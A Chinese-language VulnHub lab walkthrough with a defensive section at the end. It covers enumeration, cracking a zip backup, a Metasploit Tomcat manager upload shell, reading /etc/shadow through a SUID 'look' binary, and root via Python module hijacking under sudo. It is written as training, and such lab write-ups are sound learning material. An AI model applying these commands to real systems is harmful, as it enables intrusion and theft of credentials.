简介

每日一攻防是由全球安全研究员 VulnHub 提供的日常实战综合环境。大余安全将按照顺序选择 VulnHub 提供的渗透测试靶场，为网络安全爱好者、渗透测试从业者和安全研究员提供每日综合性的攻击和防御挑战。该项目的目标是促进参与者的技能提升，使他们更好地理解实际攻击和防御场景。

每日一攻防特色：
环境攻破：以简单直白的方式攻破每日选择的渗透测试环境。
代码审计：进行攻防分析，结合代码审计，深入挖掘漏洞和强化防御。

作者：大余

一、网络枚举

nmap发现ip地址：192.168.253.133

发现开启了22、80和8080端口。

二、web信息收集

访问80端口发现apache：

继续用nmap深度扫描：

--script=http-enum

发现存在zip文件和多个目录！

三、zip爆破

通过nmap脚本枚举出8080端口存在backup.zip文件：

wget http://192.168.253.133:8080/backup.zip
unzip backup.zip

下载后解压发现需要密码，利用john爆破压缩包密码：

zip2john backup.zip > hash
john hash --wordlist=/root/Desktop/rockyou.txt

@administrator_hi5

成功获得密码，解压后查看tomcat-users.xml：

得到tomcat后台账号密码：

admin
melehifokivai

四、getshell

之前nmap就扫描到8080端口存在/manager/html，访问登录：

利用msf模块exploit/multi/http/tomcat_mgr_upload拿shell：

use exploit/multi/http/tomcat_mgr_upload
set rport 8080
set rhosts 192.168.253.133
set httpusername admin
set httppassword melehifokivai
set FingerprintCheck false
run

成功获得shell！！

五、文件读取爆破

利用之前得到的密码：melehifokivai，成功切换到jaye用户：

su jaye
melehifokivai
python3 -c 'import pty; pty.spawn("/bin/sh")'

查找suid权限的文件

find / -perm -u=s -exec ls -al {} \; 2> /dev/null

利用该程序可以读取任意文件，查看目标/etc/shadow文件：

https://gtfobins.github.io/gtfobins/look/#suid

/home/jaye/Files/look '' "/etc/shadow"

john --wordlist=/root/Desktop/rockyou.txt 1

randy
07051986randy

成功通过look文件读取到秘钥爆破获得明文密码！

六、提权

切换到randy用户后查看sudo权限：

(root) PASSWD: /usr/bin/python3.8 /home/randy/randombase64.py

查看randombase64.py发现引入base64模块，修改base64模块提权！查找base64模块位置：

在文件最后加上提权代码：

import os
os.system("/bin/bash")

执行该脚本提升为root：

sudo -u root /usr/bin/python3.8 /home/randy/randombase64.py

成功获得root权限！

七、代码审计

这里源码并没有什么，开始进攻的思路是tomcat存在/manager/html，然后存在backup.zip备份文件查看到存在tomcat-users.xml文件，通过tomcat-users.xml文件查看到tomcat登录账号密码，从而登录/manager/html，通过利用msf模块exploit/multi/http/tomcat_mgr_upload拿服务器控制权限shell。我们可以这样防护：

1、更改默认账号和密码
在tomcat-users.xml文件中，确保使用强密码并修改默认账号。删除不必要的用户，仅给予最小必需的权限。

2、禁用管理页面

如果不需要Tomcat Manager应用程序，可以考虑将其禁用或限制其访问。在server.xml中配置以下片段可以限制访问：

<Context privileged="true" docBase="${catalina.home}/webapps/manager">
    <Valve className="org.apache.catalina.valves.RemoteAddrValve"
           allow="127\.0\.0\.1" />
</Context>

3、限制/manager/html的访问
可以通过配置Apache Tomcat的conf/context.xml文件限制对/manager/html的访问。在元素内添加以下配置：

<Valve className="org.apache.catalina.valves.RemoteAddrValve" allow="127\.0\.0\.1" />

这将限制只有来自本地IP地址的请求可以访问/manager/html。

4、安全配置文件
通过对web.xml和context.xml等文件进行适当的安全配置，可以增强Tomcat的安全性。禁用不必要的服务和功能，以及配置适当的访问控制。

5、监控和审计
实施监控机制，定期审计日志文件，以便检测潜在的入侵或异常活动。在Tomcat中启用详细的访问日志，以便能够追踪请求。

通过每日一攻防，我致力于共同深探网络安全的奥秘，助力每位参与者成为网络安全领域的技术高手。立即加入大余安全，共同迎接每日新的挑战！

扫描下方二维码添加小助手，进群和大余老师一起技术探讨交流吧！

欢迎大家进入大余安全回忆录帮会，每周二&五定期更新《安全开发》、《渗透测试》系列文章，帮助大家从0基础到入门。